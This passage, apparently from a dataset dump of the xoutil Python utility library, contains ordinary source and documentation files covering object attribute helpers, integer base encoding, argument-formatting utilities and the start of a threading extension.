If you want the value to be lazily evaluated you\n may provide a lazy-lambda::\n\n >>> inst = Someclass()\n >>> inst.a = 1\n >>> def setting_a():\n ... print('Evaluating!')\n ... return 'a'\n\n >>> setdefaultattr(inst, 'a', lazy(setting_a))\n 1\n\n >>> setdefaultattr(inst, 'ab', lazy(setting_a))\n Evaluating!\n 'a'\n\n \"\"\"\n res = getattr(obj, name, Unset)\n if res is Unset:\n if isinstance(value, lazy):\n value = value()\n setattr(obj, name, value)\n res = value\n return res\n\n\ndef adapt_exception(value, **kwargs):\n \"\"\"Like PEP-246, Object Adaptation, with ``adapt(value, Exception,\n None)``.\n\n If the value is not an exception is expected to be a tuple/list which\n contains an Exception type as its first item.\n\n .. versionchanged:: 1.8.0 Moved from `xotl.tools.data`:mod: module.\n\n \"\"\"\n isi, ebc = isinstance, Exception # TODO: Maybe must be `BaseException`\n issc = lambda maybe, cls: isi(maybe, type) and issubclass(maybe, cls)\n if isi(value, ebc) or issc(value, ebc):\n return value\n elif isi(value, (tuple, list)) and len(value) > 0 and issc(value[0], ebc):\n map = lambda x: x.format(**kwargs) if isinstance(x, str) else x\n ecls = value[0]\n return ecls(*(map(x) for x in value[1:]))\n else:\n return None\n\n\ndef copy_class(cls, meta=None, ignores=None, new_attrs=None, new_name=None):\n \"\"\"Copies a class definition to a new class.\n\n The returned class will have the same name, bases and module of `cls`.\n\n :param meta: If None, the `type(cls)` of the class is used to build the\n new class, otherwise this must be a *proper* metaclass.\n\n :param ignores: A sequence of attributes names that should not be copied\n to the new class.\n\n An item may be callable accepting a single argument `attr` that must\n return a non-null value if the the `attr` should be ignored.\n\n :param new_attrs: New attributes the class must have. 
These will take\n precedence over the attributes in the original class.\n\n :type new_attrs: dict\n\n :param new_name: The name for the copy. If not provided the name will\n copied.\n\n .. versionadded:: 1.4.0\n\n .. versionchanged:: 1.7.1 The `ignores` argument must an iterable of\n strings or callables. Removed the glob-pattern and regular expressions\n as possible values. They are all possible via the callable variant.\n\n .. versionadded:: 1.7.1 The `new_name` argument.\n\n \"\"\"\n from types import new_class\n from xotl.tools.future.types import MemberDescriptorType\n\n def _get_ignored(what):\n if callable(what):\n return what\n else:\n return lambda s: s == what\n\n if not meta:\n meta = type(cls)\n if ignores:\n ignores = tuple(_get_ignored(i) for i in ignores)\n ignored = lambda name: any(ignore(name) for ignore in ignores)\n else:\n ignored = None\n valid_names = (\"__class__\", \"__mro__\", \"__name__\", \"__weakref__\", \"__dict__\")\n attrs = {\n name: value\n for name, value in cls.__dict__.items()\n if name not in valid_names\n # Must remove member descriptors, otherwise the old's class\n # descriptor will override those that must be created here.\n if not isinstance(value, MemberDescriptorType)\n if ignored is None or not ignored(name)\n }\n if new_attrs:\n attrs.update(new_attrs)\n\n def exec_body(ns): # noqa: E306 new-line before def\n ns.update(attrs)\n\n name = new_name if new_name else cls.__name__\n result = new_class(name, cls.__bases__, {\"metaclass\": meta}, exec_body)\n return result\n\n\n# Real signature is (*sources, target, *, default=None) where target is a\n# positional argument, and not a keyword.\n# TODO: First look up \"target\" in keywords and then in positional arguments.\ndef smart_copy(*args, defaults=None):\n \"\"\"Copies the first apparition of attributes (or keys) from `sources` to\n `target`.\n\n :param sources: The objects from which to extract keys or attributes.\n\n :param target: The object to fill.\n\n :param 
defaults: Default values for the attributes to be copied as\n explained below. Defaults to False.\n\n :type defaults: Either a bool, a dictionary, an iterable or a callable.\n\n Every `sources` and `target` are always positional arguments. There should\n be at least one source. `target` will always be the last positional\n argument.\n\n If `defaults` is a dictionary or an iterable then only the names provided\n by itering over `defaults` will be copied. If `defaults` is a dictionary,\n and one of its key is not found in any of the `sources`, then the value of\n the key in the dictionary is copied to `target` unless:\n\n - It's the value `~xotl.tools.symbols.Undefined`:obj:.\n\n - An exception object\n\n - A sequence with is first value being a subclass of Exception. In which\n case `adapt_exception`:class: is used.\n\n In these cases a KeyError is raised if the key is not found in the\n sources.\n\n If `defaults` is an iterable and a key is not found in any of the sources,\n None is copied to `target`.\n\n If `defaults` is a callable then it should receive one positional\n arguments for the current `attribute name` and several keyword arguments\n (we pass ``source``) and return either True or False if the attribute\n should be copied.\n\n If `defaults` is False (or None) only the attributes that do not start\n with a \"_\" are copied, if it's True all attributes are copied.\n\n When `target` is not a mapping only valid Python identifiers will be\n copied.\n\n Each `source` is considered a mapping if it's an instance of\n `collections.Mapping` or a `MappingProxyType`.\n\n The `target` is considered a mapping if it's an instance of\n `collections.MutableMapping`.\n\n :returns: `target`.\n\n .. 
versionchanged:: 1.7.0 `defaults` is now keyword only.\n\n \"\"\"\n from xotl.tools.future.collections import MutableMapping, Mapping\n from xotl.tools.symbols import Undefined\n from xotl.tools.validators.identifiers import is_valid_identifier\n from xotl.tools.values.simple import logic_iterable_coerce, nil\n\n *sources, target = args\n if not sources:\n raise TypeError(\"smart_copy() requires at least one source\")\n if isinstance(target, (bool, type(None), int, float, str)):\n raise TypeError(\n \"target should be a mutable object, not \" \"{}\".format(type(target).__name__)\n )\n if isinstance(target, MutableMapping):\n\n def setter(key, val):\n target[key] = val\n\n else:\n\n def setter(key, val):\n if is_valid_identifier(key):\n setattr(target, key, val)\n\n _mapping = isinstance(defaults, Mapping)\n if _mapping or logic_iterable_coerce(defaults) is not nil:\n for key, val in (\n (key, get_first_of(sources, key, default=Unset)) for key in defaults\n ):\n if val is Unset:\n if _mapping:\n val = defaults.get(key, None)\n else:\n val = None\n exc = adapt_exception(val, key=key)\n if exc or val is Undefined:\n raise KeyError(key)\n setter(key, val)\n else:\n keys = []\n for source in sources:\n get = smart_getter(source)\n items = source if isinstance(source, Mapping) else dir(source)\n for key in items:\n private = isinstance(key, str) and key.startswith(\"_\")\n if (defaults is False or defaults is None) and private:\n copy = False\n elif callable(defaults):\n copy = defaults(key, source=source)\n else:\n copy = True\n if key not in keys:\n keys.append(key)\n if copy:\n setter(key, get(key))\n return target\n\n\ndef extract_attrs(obj, *names, **kwargs):\n \"\"\"Extracts all `names` from an object.\n\n If `obj` is a Mapping, the names will be search in the keys of the `obj`;\n otherwise the names are considered regular attribute names.\n\n If `default` is Unset and any name is not found, an AttributeError is\n raised, otherwise the `default` is used 
instead.\n\n Returns a tuple if there are more that one name, otherwise returns a\n single value.\n\n .. versionadded:: 1.4.0\n\n .. versionchanged:: 1.5.3 Each `name` may be a path like in\n `get_traverser`:func:, but only \".\" is allowed as separator.\n\n \"\"\"\n default = kwargs.pop(\"default\", Unset)\n if kwargs:\n raise TypeError(\"Invalid keyword arguments for `extract_attrs`\")\n getter = get_traverser(*names, default=default)\n return getter(obj)\n\n\ndef traverse(obj, path, default=Unset, sep=\".\", getter=None):\n \"\"\"Traverses an object's hierarchy by performing an attribute get at each\n level.\n\n This helps getting an attribute that is buried down several levels\n deep. For example::\n\n traverse(request, 'session.somevalue')\n\n If `default` is not provided (i.e is `~xotl.tools.symbols.Unset`:obj:) and\n any component in the path is not found an AttributeError exceptions is\n raised.\n\n You may provide `sep` to change the default separator.\n\n You may provide a custom `getter`. By default, does an\n `smart_getter`:func: over the objects. If provided `getter` should have\n the signature of `getattr`:func:.\n\n See `get_traverser`:func: if you need to apply the same path(s) to several\n objects. Actually this is equivalent to::\n\n get_traverser(path, default=default, sep=sep, getter=getter)(obj)\n\n \"\"\"\n _traverser = get_traverser(path, default=default, sep=sep, getter=getter)\n return _traverser(obj)\n\n\ndef get_traverser(*paths, **kw):\n \"\"\"Combines the power of `traverse`:func: with the expectations from both\n `operator.itemgetter`:func: and `operator.attrgetter`:func:.\n\n :param paths: Several paths to extract.\n\n Keyword arguments has the same meaning as in `traverse`:func:.\n\n :returns: A function the when invoked with an `object` traverse the object\n finding each `path`.\n\n .. 
versionadded:: 1.5.3\n\n \"\"\"\n from xotl.tools.params import check_count\n\n check_count(paths, 1, caller=\"get_traverser\")\n\n def _traverser(path, default=Unset, sep=\".\", getter=None):\n if not getter:\n getter = lambda o, a, default=None: smart_getter(o)(a, default)\n\n def inner(obj):\n found = object()\n current = obj\n attrs = path.split(sep)\n while current is not found and attrs:\n attr = attrs.pop(0)\n current = getter(current, attr, found)\n if current is found:\n if default is Unset:\n raise AttributeError(attr)\n else:\n return default\n else:\n return current\n\n return inner\n\n if len(paths) == 1:\n result = _traverser(paths[0], **kw)\n else:\n _traversers = tuple(_traverser(path, **kw) for path in paths)\n\n def _result(obj):\n return tuple(traverse(obj) for traverse in _traversers)\n\n result = _result\n return result\n\n\ndef dict_merge(*dicts, **others):\n \"\"\"Merges several dicts into a single one.\n\n Merging is similar to updating a dict, but if values are non-scalars they\n are also merged is this way:\n\n - Any two `sequences <collection.Sequence>`:class: or :class:`sets\n <collections.Set>` are joined together.\n\n - Any two mappings are recursively merged.\n\n - Other types are just replaced like in `update`:func:.\n\n If for a single key two values of incompatible types are found, raise a\n TypeError. 
If the values for a single key are compatible but different\n (i.e a list an a tuple) the resultant type will be the type of the first\n apparition of the key, unless for mappings which are always cast to dicts.\n\n No matter the types of `dicts` the result is always a dict.\n\n Without arguments, return the empty dict.\n\n \"\"\"\n from collections import Mapping, Sequence, Set, Container\n\n if others:\n dicts = dicts + (others,)\n dicts = list(dicts)\n result = {}\n collections = (Set, Sequence)\n while dicts:\n current = dicts.pop(0)\n for key, val in current.items():\n if isinstance(val, Mapping):\n val = {key: val[key] for key in val}\n value = result.setdefault(key, val)\n if value is not val:\n if all(isinstance(v, collections) for v in (value, val)):\n join = get_first_of((value,), \"__add__\", \"__or__\")\n if join:\n constructor = type(value)\n value = join(constructor(val))\n else:\n raise ValueError(\"Invalid value for key '%s'\" % key)\n elif all(isinstance(v, Mapping) for v in (value, val)):\n value = dict_merge(value, val)\n elif all(not isinstance(v, Container) for v in (value, val)):\n value = val\n else:\n raise TypeError(\"Found incompatible values for key '%s'\" % key)\n result[key] = value\n return result\n\n\n@contextmanager\ndef save_attributes(obj, *attrs, getter=smart_getter, setter=smart_setter):\n r\"\"\"A context manager that restores `obj` attributes at exit.\n\n We deal with `obj`\\ 's attributes with `smart_getter`:func: and\n `smart_setter`:func:. You can override passing keyword `getter` and\n `setter`. They must take the object and return a callable to get/set the\n its attributes.\n\n Basic example:\n\n >>> from xotl.tools.future.types import SimpleNamespace as new\n >>> obj = new(a=1, b=2)\n\n >>> with save_attributes(obj, 'a'):\n ... obj.a = 2\n ... 
obj.b = 3\n\n >>> obj.a\n 1\n\n >>> obj.b\n 3\n\n Depending on the behavior of `getter` and or the object itself, it may be\n an error to get an attribute or key that does not exists.\n\n >>> getter = lambda o: lambda a: getattr(o, a)\n >>> with save_attributes(obj, 'c', getter=getter): # doctest: +ELLIPSIS\n ... pass\n Traceback (...)\n ...\n AttributeError: ...\n\n Beware, however, that `smart_getter`:func: is non-strict by default and it\n returns None for a non-existing key or attribute. In this case, we\n attempt to set that attribute or key at exit:\n\n >>> with save_attributes(obj, 'x'):\n ... pass\n\n >>> obj.x is None\n True\n\n But, then, setting the value may fail:\n\n >>> obj = object()\n >>> with save_attribute(obj, 'x'): # doctest: +ELLIPSIS\n ... pass\n Traceback (...)\n ...\n AttributeError: ...\n\n .. versionadded:: 1.8.2\n\n \"\"\"\n from xotl.tools.params import check_count\n\n check_count(attrs, 1)\n get_ = getter(obj)\n set_ = setter(obj)\n props = {attr: get_(attr) for attr in attrs}\n try:\n yield obj\n finally:\n for attr, val in props.items():\n set_(attr, val)\n\n\n@contextmanager\ndef temp_attributes(obj, attrs, getter=smart_getter, setter=smart_setter):\n \"\"\"A context manager that temporarily sets attributes.\n\n `attrs` is a dictionary containing the attributes to set.\n\n Keyword arguments `getter` and `setter` have the same meaning as in\n `save_attributes`:func:. We also use the `setter` to set the values\n provided in `attrs`.\n\n .. 
versionadded:: 1.8.5\n\n \"\"\"\n set_ = setter(obj)\n with save_attributes(obj, *tuple(attrs.keys()), getter=getter, setter=setter):\n for attr, value in attrs.items():\n set_(attr, value)\n yield\n\n\ndef import_object(name, package=None, sep=\".\", default=None, **kwargs):\n \"\"\"Get symbol by qualified name.\n\n The name should be the full dot-separated path to the class::\n\n modulename.ClassName\n\n Example::\n\n celery.concurrency.processes.TaskPool\n ^- class name\n\n or using ':' to separate module and symbol::\n\n celery.concurrency.processes:TaskPool\n\n Examples::\n\n >>> import_object('celery.concurrency.processes.TaskPool')\n <class 'celery.concurrency.processes.TaskPool'>\n\n # Does not try to look up non-string names.\n >>> from celery.concurrency.processes import TaskPool\n >>> import_object(TaskPool) is TaskPool\n True\n\n \"\"\"\n import importlib\n\n imp = importlib.import_module\n if not isinstance(name, str):\n return name # already a class\n sep = \":\" if \":\" in name else sep\n module_name, _, cls_name = name.rpartition(sep)\n if not module_name:\n cls_name, module_name = None, package if package else cls_name\n try:\n module = imp(module_name, package=package, **kwargs)\n return getattr(module, cls_name) if cls_name else module\n except (ImportError, AttributeError):\n if default is None:\n raise\n return default\n\n\ndef delegator(attribute, attrs_map, metaclass=type):\n \"\"\"Create a base class that delegates attributes to another object.\n\n The returned base class contains a `delegated attribute descriptor\n <DelegatedAttribute>`:class: for each key in `attrs_map`.\n\n :param attribute: The attribute of the delegating object that holds the\n delegated attributes.\n\n :param attrs_map: A map of attributes to delegate. The keys are the\n attribute names the delegating object attributes, and\n the values the attribute names of the delegated object.\n\n Example:\n\n >>> class Bar:\n ... 
x = 'bar'\n\n >>> class Foo(delegator('egg', {'x1': 'x'})):\n ... def __init__(self):\n ... self.egg = Bar()\n\n >>> foo = Foo()\n >>> foo.x1\n 'bar'\n\n .. versionadded:: 1.9.3\n\n \"\"\"\n descriptors = {\n key: DelegatedAttribute(attribute, attr) for key, attr in attrs_map.items()\n }\n return metaclass(\"delegator\", (object,), descriptors)\n\n\nclass DelegatedAttribute:\n \"\"\"A delegator data descriptor.\n\n When accessed the descriptor finds the `delegated_attr` in the instance's\n value given by attribute `target_name`.\n\n If the instance has no attribute with name `target_name`, raise an\n AttributeError.\n\n If the target object does not have an attribute with name `delegate_attr`\n and `default` is `~xotl.tools.symbols.Unset`:data:, raise an\n AttributeError. If `default` is not Unset, return `default`.\n\n .. versionadded:: 1.9.3\n\n \"\"\"\n\n def __init__(self, target_name, delegated_attr, default=Unset):\n self.target_name = target_name\n self.attr = delegated_attr\n self.default = default\n\n def __get__(self, instance, owner):\n if instance is not None:\n target = getattr(instance, self.target_name)\n try:\n return getattr(target, self.attr)\n except AttributeError:\n if self.default is not Unset:\n return self.default\n else:\n raise\n else:\n return self\n\n def __repr__(self):\n return \"<DelegatedAttr '%s.%s'>\" % (self.target_name, self.attr)\n\n\ndel contextmanager, deprecated\n" }, { "alpha_fraction": 0.5336044430732727, "alphanum_fraction": 0.5774828791618347, "avg_line_length": 23.082473754882812, "blob_id": "8e5f9f6b2377f90b4f7122189fbf535fb865d4e0", "content_id": "7b004f782d0125da226d2fce55ce46bca11d5c74", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4673, "license_type": "no_license", "max_line_length": 87, "num_lines": 194, "path": "/xotl/tools/bases.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 
-*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Integer encoding and decoding in different bases.\n\n\"\"\"\n\n_DEFAULT_TABLE = \"0123456789\" \"abcdefghijklmnopqrstuvwxyz\" \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\n_MAX_BASE = len(_DEFAULT_TABLE)\n\n_DEFAULT_BASE = _MAX_BASE\n\n\ndef _check_base(base):\n \"\"\"Check a base to be used in string to integer conversions.\n\n Return a tuple (base, table) if valid or raise an exception.\n\n \"\"\"\n if isinstance(base, int):\n table = _DEFAULT_TABLE\n if not (1 < base <= _MAX_BASE):\n raise ValueError(\"`base` must be between 2 and %s\" % _MAX_BASE)\n elif isinstance(base, str):\n table = base\n base = len(table)\n else:\n msg = (\n \"`base` must be an integer (base) or a string (table) with \"\n 'length greater or equal to 2; %s \"%s\" given'\n )\n raise TypeError(msg % (type(base).__name__, base))\n return base, table\n\n\ndef int2str(number, base=_DEFAULT_BASE):\n \"\"\"Return the string representation of an integer using a base.\n\n :param base: The base.\n :type base: Either an integer or a string with a custom table.\n\n Examples::\n\n >>> int2str(65535, 16)\n 'ffff'\n\n >>> int2str(65535)\n 'h31'\n\n >>> int2str(65110208921, 'merchise')\n 'ehimseiemsce'\n\n >>> int2str(651102, 2)\n '10011110111101011110'\n\n \"\"\"\n base, table = _check_base(base)\n sign = \"\" if number >= 0 else \"-\"\n number = abs(number)\n res = table[0] if number == 0 else \"\"\n while number:\n number, idx = divmod(number, base)\n res = table[idx] + res\n return str(sign + res)\n\n\ndef str2int(src, base=_DEFAULT_BASE):\n \"\"\"Return the integer decoded from a string representation using a base.\n\n :param base: The base.\n :type base: Either an integer or a string with a custom table.\n\n Examples::\n\n >>> str2int('ffff', 16)\n 65535\n\n >>> 
str2int('1c', 16) == int('1c', 16)\n True\n\n >>> base = 'merchise'\n >>> number = 65110208921\n >>> str2int(int2str(number, base), base) == number\n False\n\n >>> base = 32\n >>> str2int(int2str(number, base), base) == number\n True\n\n \"\"\"\n base, table = _check_base(base)\n if src.startswith(\"-\"):\n sign = -1\n i = 1\n else:\n sign = 1\n i = 0\n res = 0\n while i < len(src):\n res *= base\n res += table.index(src[i])\n i += 1\n return sign * res\n\n\nclass BaseConvertor:\n \"\"\"Base class that implements conversion algorithms based on a simple\n lookup table and a bit mask.\n\n Derived classes *must* provide a `table` attribute with the table of\n digits to use.\n\n \"\"\"\n\n @classmethod\n def inttobase(cls, num):\n \"\"\"Converts an integer to a base representation using the class' table.\n\n \"\"\"\n return int2str(num, base=cls.table)\n\n @classmethod\n def basetoint(cls, istr):\n \"\"\"Converts a base representation to a integer using the class' table.\n\n \"\"\"\n table = cls.table\n if cls.case_insensitive:\n table = table.lower()\n return str2int(istr, base=table)\n\n\nclass B32(BaseConvertor):\n \"\"\"Handles base-32 conversions.\n\n In base 32, each 5-bits chunks are represented by a single \"digit\". Digits\n comprises all symbols in 0..9 and a..v.\n\n >>> B32.inttobase(32) == '10'\n True\n\n >>> B32.basetoint('10')\n 32\n\n \"\"\"\n\n table = \"0123456789abcdefghijklmnopqrstuv\"\n case_insensitive = True\n\n\nclass B64(BaseConvertor):\n \"\"\"Handles [a kind of] base 64 conversions.\n\n This **is not standard base64**, but a reference-friendly base 64 to help\n the use case of generating a short reference.\n\n In base 64, each 6-bits chunks are represented by a single \"digit\".\n Digits comprises all symbols in 0..9, a..z, A..Z and the three symbols:\n `()[`.\n\n >>> B64.inttobase(64) == '10'\n True\n\n >>> B64.basetoint('10')\n 64\n\n .. 
warning::\n\n In this base, letters **are** case sensitive::\n\n >>> B64.basetoint('a')\n 10\n\n >>> B64.basetoint('A')\n 36\n\n \"\"\"\n\n table = \"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXZ()[\"\n case_insensitive = False\n\n\nclass B64symbolic(B64):\n \"\"\"Same as B64 but uses no capital letters and lots of symbols.\"\"\"\n\n table = \"0123456789abcdefghijklmnopqrstuvwxyz\" \":;><,._=!@#$^*/?\\\\{}%`|\\\"()[~'\"\n case_insensitive = True\n" }, { "alpha_fraction": 0.58984375, "alphanum_fraction": 0.591796875, "avg_line_length": 21.2608699798584, "blob_id": "85da179f37cfcb9b3ec6ab887283557860ed7413", "content_id": "536c55753b540355cd5e597bc25b47246f760075", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 512, "license_type": "permissive", "max_line_length": 78, "num_lines": 23, "path": "/docs/source/xotl.tools/fp.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.fp`:mod: -- Functional Programming in Python\n========================================================\n\n.. automodule:: xotl.tools.fp\n :synopsis: In Functional Programming a problem is decomposed into a set of\n functions.\n :members:\n\n--------------\n\nIdeally, a function only takes inputs and produce outputs, and doesn't have\nany internal state that affects the output produced for a given input (like in\nHaskell).\n\n\nContents\n--------\n\n.. 
toctree::\n :maxdepth: 1\n :glob:\n\n fp/*\n" }, { "alpha_fraction": 0.6651305556297302, "alphanum_fraction": 0.683563768863678, "avg_line_length": 31.549999237060547, "blob_id": "19a9b4e5e9d33bb8ce852b172c02134639c2ba27", "content_id": "6175a3e8df6ff34fd24d6506fc920a60295f0f9d", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 651, "license_type": "permissive", "max_line_length": 73, "num_lines": 20, "path": "/docs/source/history/_changes-1.9.0.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- With the release of 2.0.0, xoutil ends it support for Python 2.\n\n Releases 1.9 are a *continuation* of the 1.8 series and don't break any\n API found in the last release of that series: 1.8.8.\n\n- Add `xoutil.objects.import_object`:func:.\n\n- Add `xoutil.context.Context.from_defaults`:meth: and\n `xoutil.context.Context.from_dicts`:meth:.\n\n- Deprecate imports from top-level `xoutil`:mod:. The following objects\n should be imported from `xoutil.symbols`:mod:\\ :\n\n .. 
hlist::\n :columns: 3\n\n - `~xoutil.symbols.Unset`:obj:\n - `~xoutil.symbols.Undefined`:obj:\n - `~xoutil.symbols.Invalid`:obj:\n - `~xoutil.symbols.Ignored`:obj:\n" }, { "alpha_fraction": 0.5798125267028809, "alphanum_fraction": 0.584282636642456, "avg_line_length": 34.02525329589844, "blob_id": "a995e357cffc34683c5a57bdee2bf3611893588c", "content_id": "786f604c5d5131d6b39e77371e5189fd66881513", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6938, "license_type": "no_license", "max_line_length": 78, "num_lines": 198, "path": "/xotl/tools/tools.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Simple tools minimizing dependencies on other modules.\n\nThe only used module is Python's standard `re`:mod: module.\n\n\"\"\"\n\n\n# TODO: review this\ndef nameof(obj):\n \"\"\"Give the name of an object.\n\n First try normally named object (those having a ``'__name__'`` attribute);\n then some special classes instances that wraps the name internally are\n checked; then it tests for some objects that are singletons [#sing]_;\n finally -as a default tentative- return the type name.\n\n For example::\n\n >>> nameof(object)\n 'object'\n\n >>> nameof(lambda x: x)\n '<lambda>'\n\n >>> singletons = (None, True, False, Ellipsis, NotImplemented)\n >>> [nameof(s) for s in singletons]\n ['None', 'True', 'False', 'Ellipsis', 'NotImplemented']\n\n >>> nameof(0)\n 'int'\n\n This is a beginning intended to deprecate a \"fauna\" of several existing\n functions with the same purpose around several modules.\n\n .. 
[#sing] In this case an object is considered a signgleton if both of\n its representation strings (``str(obj)`` and ``repr(obj)``)\n match and it is a valid identifier.\n\n \"\"\"\n try:\n return obj.__name__\n except AttributeError:\n if isinstance(obj, (staticmethod, classmethod)):\n return obj.__func__.__name__\n else: # try for singleton\n import re\n\n res = str(obj)\n identifier_regex = \"(?i)^[_a-z][_a-z0-9]*$\" # TODO: Py3?\n if res == repr(obj) and re.match(identifier_regex, res):\n return res\n else:\n return type(obj).__name__\n\n\n# TODO: Move all functions in this module to a new place\n\n\ndef args_repr(args, **options):\n \"\"\"Format positional arguments to use in exception handling.\n\n :params args: tuple as obtained in arguments when declared in a function\n as ``*args``.\n\n :param options: some extra options could be used as excess keyword\n arguments.\n\n - count: maximum amount of actual parameters to process; after\n reached that amount a tail item is appended with the remainder\n number. If None is given -the default- the value ``3`` is used.\n\n - cast: must be a function to convert the value into the\n representation; when no value is given -the default- it's assumed\n ``λ arg: type(arg).__name__``.\n\n - item_format: the format for each argument type, if no value is\n given the value \"{}\" is used. 
Each item is obtained as with the\n \"cast\" function.\n\n - tail_format: a format string for the tail with the remainder (not\n processed arguments) specification; must contain a positional\n (like \"{}\") format specifier if obtaining the remainder count is\n desired; when no value is given -the default- the value \"...\" is\n used; another valid example could be \"and {} more\".\n\n - joiner: could be a function or a string to join all parts\n including the tail; if no value is given -the default- the value\n \", \" is used (thed equivalent to ``', '.join``).\n\n For example::\n\n >>> args_repr((1, 2.0, \"3\", {}))\n 'int, float, str, ...'\n\n \"\"\"\n count = options.get(\"count\", 3)\n cast = options.get(\"cast\", lambda arg: type(arg).__name__)\n item_format = options.get(\"item_format\", \"{}\")\n tail_format = options.get(\"tail_format\", \"...\")\n joiner = options.get(\"joiner\", \", \")\n if isinstance(joiner, str):\n joiner = str(joiner).join\n parts = []\n i = 0\n while i < min(count, len(args)):\n parts.append(item_format.format(cast(args[i])))\n i += 1\n rem = len(args) - i\n if rem > 0:\n parts.append(tail_format.format(rem))\n return joiner(parts)\n\n\ndef kwargs_repr(kwargs, **options):\n \"\"\"Format positional arguments to use in exception handling.\n\n :params kwargs: dict as obtained in arguments when declared as\n ``**kwargs``.\n\n :param options: some extra options are used in this function.\n\n - count: maximum amount of actual parameters to process; after\n reached that amount a tail item is appended with the remainder\n number. If None is given -the default- the value ``3`` is used.\n\n - cast: must be a function to convert the value into the\n representation; when no value is given -the default- it's assumed\n ``λ arg: type(arg).__name__``.\n\n - item_format: the format for each argument type, if no value is\n given the value \"{}:{}\" is used. 
Each item value is\n obtained as with the \"cast\" function.\n\n - tail_format: a format string for the tail with the remainder (not\n processed arguments) specification; must contain a positional\n (like \"{}\") format specifier if obtaining the remainder count is\n desired; when no value is given -the default- the value \"...\" is\n used; another valid example could be \"and {} more\".\n\n - joiner: could be a function or a string to join all parts\n including the tail; if no value is given -the default- the value\n \", \" is used (thed equivalent to ``', '.join``).\n\n For example::\n\n >>> kwargs_repr({'x': 1, 'y': 2.0, 'z': '3', 'zz': {}})\n 'x:int, y:float, z:str, ...'\n\n \"\"\"\n count = options.get(\"count\", 3)\n cast = options.get(\"cast\", lambda arg: type(arg).__name__)\n item_format = options.get(\"item_format\", \"{}:{}\")\n tail_format = options.get(\"tail_format\", \"...\")\n joiner = options.get(\"joiner\", \", \")\n if isinstance(joiner, str):\n joiner = str(joiner).join\n parts = []\n keys = list(kwargs)\n keys.sort()\n i = 0\n while i < min(count, len(keys)):\n key = keys[i]\n value = kwargs[key]\n parts.append(item_format.format(key, cast(value)))\n i += 1\n rem = len(keys) - i\n if rem > 0:\n parts.append(tail_format.format(rem))\n return joiner(parts)\n\n\ndef both_args_repr(args, kwargs, **options):\n \"\"\"Combine both argument kind representations.\n\n Both kinds are: positional (see `args_repr`:func:) and keyword (see\n `kwargs_repr`:func:).\n\n For example::\n\n >>> both_args_repr((1, 2.0, \"3\"), {'x': 1, 'y': 2.0, 'z': '3'})\n 'int, float, str, x:int, y:float, z:str'\n\n \"\"\"\n joiner = options.get(\"joiner\", \", \")\n if isinstance(joiner, str):\n joiner = str(joiner).join\n items = (args, args_repr), (kwargs, kwargs_repr)\n parts = [res for res in (fn(aux, **options) for aux, fn in items) if res]\n return joiner(parts)\n" }, { "alpha_fraction": 0.588850200176239, "alphanum_fraction": 0.5901902914047241, "avg_line_length": 
27.922481536865234, "blob_id": "947e64fb03aab1191b35cf33aace28d22184757f", "content_id": "87fe1c7b82b72992259120eede20db471102d426", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3732, "license_type": "no_license", "max_line_length": 79, "num_lines": 129, "path": "/xotl/tools/future/threading.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Extensions to Python's `threading` module.\n\nYou may use it as drop-in replacement of ``threading``. Although we don't\ndocument all items here. Refer to `threading`:mod: documentation.\n\n\"\"\"\n\nfrom threading import * # noqa\nimport threading as _stdlib # noqa\n\nfrom threading import Event, Thread, RLock, Timer\n\n\ndef async_call(func, args=None, kwargs=None, callback=None, onerror=None):\n \"\"\"Executes a function asynchronously.\n\n The function receives the given positional and keyword arguments\n\n If `callback` is provided, it is called with a single positional argument:\n the result of calling `func(*args, **kwargs)`.\n\n If the called function ends with an exception and `onerror` is provided, it\n is called with the exception object.\n\n :returns: An event object that gets signalled when the function ends its\n execution whether normally or with an error.\n\n :rtype: `Event`:class:\n\n \"\"\"\n event = Event()\n event.clear()\n if not args:\n args = ()\n if not kwargs:\n kwargs = {}\n\n def async_():\n try:\n result = func(*args, **kwargs)\n if callback:\n callback(result)\n except Exception as error:\n if onerror:\n onerror(error)\n finally:\n event.set()\n\n thread = Thread(target=async_)\n thread.setDaemon(True) # XXX: Why?\n 
